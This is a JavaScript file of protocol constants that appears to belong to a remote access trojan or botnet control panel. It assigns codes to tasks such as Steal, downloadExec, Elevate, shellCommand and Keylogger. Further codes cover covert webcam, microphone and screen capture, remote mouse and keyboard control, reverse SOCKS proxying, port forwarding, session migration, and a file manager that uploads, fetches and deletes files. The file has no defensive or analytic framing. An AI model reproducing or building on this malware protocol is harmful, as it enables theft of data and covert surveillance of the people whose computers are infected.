const clientRequest = {
	wdo: "1",
	hwid: "2",
	data: "3",
	task: "4",
}
const serverResponse = {
	result: "1",
	data: "2",
	task: "3",
}
const clientDo = {
	connect: "1",
	getTask: "2",
	setTask: "3",
	getData: "4",
	setData: "5",
	saveLog: "6",
	reportError: "7",
}
const Tasks = {
	Wait: "1",
	Uninstall: "2",
	Exit: "3",
	webSocket: "4",
	reInit: "5",
	downloadExec: "6",
	executeCommand: "7",
	shellCommand: "8",
	Steal: "9",
	Update: "a",
	Elevate: "b",
	Download: "c",
	getScreen: "d",
}
const wsResponse = {
	debug: "1",
	screenShot: "2",
	ffScreenShot: "3",
	camShot: "4",
	taskStatus: "5",
	gotDevices: "6",
	gotProcesses: "7",
	gotWindows: "8",
	fileManager: "9",
	shellResponse: "a",
	gotWebcams: "b",
	gotMonitors: "c",
	childSessionsStatus: "d",
	Pong: "e",
	gotSessions: "f",
	ffmpegStatus: "g",
	gotMics: "h",
	soundShot: "i",
	expandEnvResult: "j",
	gotUptime: "k",
	gotSets: "l",
	shellCommandResponse: "m",
}
const wsRequest = {
	screenCommand: "1",
	getTask: "2",
	getDevices: "3",
	getProcesses: "4",
	killProcessPid: "5",
	killProcessName: "6",
	getWindows: "7",
	killWindow: "8",
	fileManagerCommand: "9",
	startShell: "a",
	stopShell: "b",
	sendShellCommand: "c",
	startRsocks: "d",
	stopRsocks: "e",
	startPortFwd: "f",
	stopPortFwd: "g",
	getWebcams: "h",
	startWebcam: "i",
	stopWebcam: "j",
	uploadExecUrl: "k",
	Sessions: "l",
	Ping: "m",
	getMics: "n",
	startMic: "o",
	stopMic: "p",
	shellCommand: "q",
	dupeSocket: "r",
	executeCommand: "s",
	closeSocket: "t",
	expandEnv: "u",
	getSets: "v",
	Keylogger: "w",
}
const Keylogger = {
	Start: "1",
	Stop: "2",
	Clear: "3",
}
const Sessions = {
	childSessionsStatus: "1",
	enableChildSessions: "2",
	disableChildSessions: "3",
	getSessions: "4",
	migrateSession: "5",
	getUptime: "6",
}
const fileManagerResponse = {
	gotDrives: "1",
	gotFolder: "2",
	gotFile: "3",
	fileUploaded: "4",
	gotFolder2: "5",
	gotChunk: "6",
	flushChunks: "7",
	chunkUploaded: "8",
}
const fileManagerCommands = {
	getDrives: "1",
	getFolder: "2",
	zipFilesCreate: "3",
	unzip: "4",
	Delete: "5",
	uploadFile: "6",
	getZip: "7",
	getFile: "8",
	uploadUrl: "9",
	getFolder2: "a",
	uploadUrlUnsafe: "b",
	uploadChunk: "c",
	flushChunks: "d",
	gotChunk: "e",
	setChunkSize: "f",
}
const screenCommand = {
	Start: "1",
	StartCurrent: "2",
	StartFFmpeg: "3",
	Stop: "4",
	getMonitors: "5",
	moveCursor: "6",
	mouseKeyDown: "7",
	mouseKeyUp: "8",
	mouseScroll: "9",
	keyboardKeyDown: "a",
	keyboardKeyUp: "b",
	moveCursorRelative: "c",
}
const taskStatus = {
	created: "1",
	sent: "2",
	started: "3",
	done: "4",
}
